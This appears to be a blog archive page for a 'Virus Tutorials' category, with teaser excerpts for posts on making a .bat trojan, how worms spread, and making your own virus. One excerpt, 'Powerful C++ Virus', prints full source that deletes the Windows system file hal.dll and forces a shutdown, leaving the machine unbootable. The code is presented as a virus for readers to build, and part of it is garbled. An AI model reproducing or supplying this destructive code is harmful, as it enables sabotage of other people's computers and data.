Find


Archive for the 'Virus Tutorials' Category

 

Making your own trojan in a .bat file

Jun 09, 2008 in Trojan Horse, Virus Tutorials

Open a dos prompt we will only need a dos prompt , and windows xp…
-Basics-
Opening a dos prompt -> Go to start and then execute and write
cmd and press ok
Now insert this command: net
And you will get something like this
NET [ ACCOUNTS | COMPUTER | CONFIG | CONTINUE | FILE | GROUP | HELP |
HELPMSG […]

Popularity: 59% [?]

⇥ Read the article in full

No Comments »

How does Worms work ?

Dec 22, 2007 in Virus Tutorials

People use e-mail more than any other application on the internet, but it can be a frustrating experience, with spam and especially e-mail worms filling our inboxes.
Worms can spread rapidly over computer networks, the traffic they create bringing those networks to a crawl. And worms can cause other damage, such as allowing unauthorized access to […]

Popularity: 40% [?]

⇥ Read the article in full

No Comments »

Powerful C++ Virus

Dec 04, 2007 in Hacking Computer, Hardcore Hacking, Virus Tutorials

This is a powerful C++ virus, which deletes Hal.dll, something that is required for startup. After deleting that, it shuts down, never to start again.
Warning: Do not try this on your home computer.The Original Code:
Code:
#include#include
using namespace std;
int main(int argc, char *argv[]){std::remove(”C:\\windows\\system32\\hal.dll”); //PWNAGE TIMEsystem(”shutdown -s -r”);system(”PAUSE”);return EXIT_SUCCESS;}

A more advanced version of this virus which makes the […]

Popularity: 28% [?]

⇥ Read the article in full

No Comments »

How to Make your own Virus

Dec 04, 2007 in Hacking Computer, Hardcore Hacking, Virus Tutorials

Yes Now it is possible for you to have your own virus. But before doing anything yourself first of all you need to read the whole article first. And let me remind you that any problem occurs after you do anything then you are solely responsible for what has happened and I will not be […]

Popularity: 32% [?]

⇥ Read the article in full

4 Comments »